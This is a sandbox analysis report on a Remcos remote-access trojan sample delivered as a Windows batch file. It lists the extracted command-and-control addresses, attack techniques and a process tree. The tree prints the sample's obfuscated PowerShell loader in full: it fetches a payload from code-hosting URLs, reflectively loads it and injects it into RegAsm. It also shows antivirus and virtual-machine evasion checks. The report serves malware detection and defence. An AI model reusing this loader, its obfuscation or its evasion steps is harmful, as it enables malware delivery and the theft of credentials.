remcos | 0c96359b10b505830decc2c11ed165479af4f89f46c0994428833100e5195cbc

Analysis

max time kernel
42s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
10-10-2024 11:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Документи.bat
Size

13KB
MD5

4303710398af710fc8acfa7a732aafbd
SHA1

42847713dd9c5313831656894505063c4949a018
SHA256

0a2b1844b3ef7454a977db405d7b86cac2cf6e93cd09773db843290f1e9f0d97
SHA512

d9d88afbfd28a3b0d422be566ba1113e8c21d3d82b32c611800536ef67eb0b9c06392b4d4413b8174b489be56ec0dd1e9ffadb991f197a0336fa1b3937c2001a
SSDEEP

192:OqDZujXdVzn3qxkk5Eno3vvb17652yVjjG/tw+qNbgAcnjz9qjgZn5:ZsjtZnzxn0vb17MNu4B8jcEX

Score

10^/10

remcos host_one collection discovery execution persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

host_one

101.99.94.69:2404

101.99.94.69:8090

101.99.94.69:44444

101.99.94.69:80

101.99.94.69:21

101.99.94.69:4899

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
rmc
mouse_option
false
mutex
Rmc-UP4CTA
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 748 created 3328	748	Lucas.pif	52

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4972-136-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/3472-135-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1636-142-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4972-136-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3472-135-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
2	4328	powershell.exe
3	4328	powershell.exe
7	4928	powershell.exe
8	4928	powershell.exe
9	4928	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2380	powershell.exe
4928	powershell.exe
1900	powershell.exe
4328	powershell.exe

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
3676	PdfReaderEn.EXE
2656	MicrosoftServiceUpdater.exe
748	Lucas.pif

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	MicrosoftServiceUpdater.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
1	bitbucket.org
2	bitbucket.org
4	raw.githubusercontent.com
7	raw.githubusercontent.com
8	bitbucket.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3644	tasklist.exe
3020	tasklist.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4328 set thread context of 3088	4328	powershell.exe	83
PID 4928 set thread context of 3148	4928	powershell.exe	106
PID 3148 set thread context of 3472	3148	RegAsm.exe	107
PID 3148 set thread context of 4972	3148	RegAsm.exe	108
PID 3148 set thread context of 1636	3148	RegAsm.exe	109

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\DesignerQuiet	PdfReaderEn.EXE
File opened for modification	C:\Windows\HardwoodBrochure	PdfReaderEn.EXE
File opened for modification	C:\Windows\ConcreteChaos	PdfReaderEn.EXE
File opened for modification	C:\Windows\RespondingBeans	PdfReaderEn.EXE
File opened for modification	C:\Windows\PostsPatrick	PdfReaderEn.EXE
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PdfReaderEn.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lucas.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
1900	powershell.exe
1900	powershell.exe
4328	powershell.exe
4328	powershell.exe
2380	powershell.exe
2380	powershell.exe
4928	powershell.exe
4928	powershell.exe
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif
4928	powershell.exe
4928	powershell.exe
3472	RegAsm.exe
3472	RegAsm.exe
1636	RegAsm.exe
1636	RegAsm.exe
3472	RegAsm.exe
3472	RegAsm.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3148	RegAsm.exe
3148	RegAsm.exe
3148	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3608	WMIC.exe
Token: SeSecurityPrivilege	3608	WMIC.exe
Token: SeTakeOwnershipPrivilege	3608	WMIC.exe
Token: SeLoadDriverPrivilege	3608	WMIC.exe
Token: SeSystemProfilePrivilege	3608	WMIC.exe
Token: SeSystemtimePrivilege	3608	WMIC.exe
Token: SeProfSingleProcessPrivilege	3608	WMIC.exe
Token: SeIncBasePriorityPrivilege	3608	WMIC.exe
Token: SeCreatePagefilePrivilege	3608	WMIC.exe
Token: SeBackupPrivilege	3608	WMIC.exe
Token: SeRestorePrivilege	3608	WMIC.exe
Token: SeShutdownPrivilege	3608	WMIC.exe
Token: SeDebugPrivilege	3608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3608	WMIC.exe
Token: SeRemoteShutdownPrivilege	3608	WMIC.exe
Token: SeUndockPrivilege	3608	WMIC.exe
Token: SeManageVolumePrivilege	3608	WMIC.exe
Token: 33	3608	WMIC.exe
Token: 34	3608	WMIC.exe
Token: 35	3608	WMIC.exe
Token: 36	3608	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3608	WMIC.exe
Token: SeSecurityPrivilege	3608	WMIC.exe
Token: SeTakeOwnershipPrivilege	3608	WMIC.exe
Token: SeLoadDriverPrivilege	3608	WMIC.exe
Token: SeSystemProfilePrivilege	3608	WMIC.exe
Token: SeSystemtimePrivilege	3608	WMIC.exe
Token: SeProfSingleProcessPrivilege	3608	WMIC.exe
Token: SeIncBasePriorityPrivilege	3608	WMIC.exe
Token: SeCreatePagefilePrivilege	3608	WMIC.exe
Token: SeBackupPrivilege	3608	WMIC.exe
Token: SeRestorePrivilege	3608	WMIC.exe
Token: SeShutdownPrivilege	3608	WMIC.exe
Token: SeDebugPrivilege	3608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3608	WMIC.exe
Token: SeRemoteShutdownPrivilege	3608	WMIC.exe
Token: SeUndockPrivilege	3608	WMIC.exe
Token: SeManageVolumePrivilege	3608	WMIC.exe
Token: 33	3608	WMIC.exe
Token: 34	3608	WMIC.exe
Token: 35	3608	WMIC.exe
Token: 36	3608	WMIC.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	3644	tasklist.exe
Token: SeDebugPrivilege	3020	tasklist.exe
Token: SeDebugPrivilege	1636	RegAsm.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
748	Lucas.pif
748	Lucas.pif
748	Lucas.pif

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3148	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 3608	2072	cmd.exe	78
PID 2072 wrote to memory of 3608	2072	cmd.exe	78
PID 2072 wrote to memory of 536	2072	cmd.exe	79
PID 2072 wrote to memory of 536	2072	cmd.exe	79
PID 2072 wrote to memory of 1900	2072	cmd.exe	81
PID 2072 wrote to memory of 1900	2072	cmd.exe	81
PID 1900 wrote to memory of 4328	1900	powershell.exe	82
PID 1900 wrote to memory of 4328	1900	powershell.exe	82
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 4328 wrote to memory of 3088	4328	powershell.exe	83
PID 3088 wrote to memory of 3676	3088	RegAsm.exe	84
PID 3088 wrote to memory of 3676	3088	RegAsm.exe	84
PID 3088 wrote to memory of 3676	3088	RegAsm.exe	84
PID 3676 wrote to memory of 1968	3676	PdfReaderEn.EXE	85
PID 3676 wrote to memory of 1968	3676	PdfReaderEn.EXE	85
PID 3676 wrote to memory of 1968	3676	PdfReaderEn.EXE	85
PID 3088 wrote to memory of 2656	3088	RegAsm.exe	87
PID 3088 wrote to memory of 2656	3088	RegAsm.exe	87
PID 2656 wrote to memory of 4364	2656	MicrosoftServiceUpdater.exe	88
PID 2656 wrote to memory of 4364	2656	MicrosoftServiceUpdater.exe	88
PID 4364 wrote to memory of 5072	4364	cmd.exe	90
PID 4364 wrote to memory of 5072	4364	cmd.exe	90
PID 5072 wrote to memory of 2380	5072	WScript.exe	91
PID 5072 wrote to memory of 2380	5072	WScript.exe	91
PID 2380 wrote to memory of 4928	2380	powershell.exe	93
PID 2380 wrote to memory of 4928	2380	powershell.exe	93
PID 1968 wrote to memory of 3644	1968	cmd.exe	94
PID 1968 wrote to memory of 3644	1968	cmd.exe	94
PID 1968 wrote to memory of 3644	1968	cmd.exe	94
PID 1968 wrote to memory of 4816	1968	cmd.exe	95
PID 1968 wrote to memory of 4816	1968	cmd.exe	95
PID 1968 wrote to memory of 4816	1968	cmd.exe	95
PID 1968 wrote to memory of 3020	1968	cmd.exe	96
PID 1968 wrote to memory of 3020	1968	cmd.exe	96
PID 1968 wrote to memory of 3020	1968	cmd.exe	96
PID 1968 wrote to memory of 4800	1968	cmd.exe	97
PID 1968 wrote to memory of 4800	1968	cmd.exe	97
PID 1968 wrote to memory of 4800	1968	cmd.exe	97
PID 1968 wrote to memory of 4156	1968	cmd.exe	98
PID 1968 wrote to memory of 4156	1968	cmd.exe	98
PID 1968 wrote to memory of 4156	1968	cmd.exe	98
PID 1968 wrote to memory of 1408	1968	cmd.exe	99
PID 1968 wrote to memory of 1408	1968	cmd.exe	99
PID 1968 wrote to memory of 1408	1968	cmd.exe	99
PID 1968 wrote to memory of 4924	1968	cmd.exe	100
PID 1968 wrote to memory of 4924	1968	cmd.exe	100
PID 1968 wrote to memory of 4924	1968	cmd.exe	100
PID 1968 wrote to memory of 748	1968	cmd.exe	101
PID 1968 wrote to memory of 748	1968	cmd.exe	101
PID 1968 wrote to memory of 748	1968	cmd.exe	101
PID 1968 wrote to memory of 1960	1968	cmd.exe	102
PID 1968 wrote to memory of 1960	1968	cmd.exe	102
PID 1968 wrote to memory of 1960	1968	cmd.exe	102

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Документи.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3608
- - C:\Windows\system32\find.exe
    find "QEMU"
    3⤵
    PID:536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBu#GY#bgBj#EY#aQBj#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe $OWjuxD"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.nfncFic/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4328
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3088
      - C:\Users\Admin\AppData\Local\Temp\PdfReaderEn.EXE
        
        C:\Users\Admin\AppData\Local\Temp\PdfReaderEn.EXE
        6⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3676
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1968
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3644
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4816
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3020
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4800
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 603423
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4156
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "speechesdjexpandingsoviet" Controllers
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1408
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Southampton + ..\Transition + ..\Mars + ..\Paying + ..\Clay + ..\Usually + ..\Fighters + ..\Disposition + ..\Models + ..\Semester s
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\603423\Lucas.pif
        
        Lucas.pif s
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:748
        
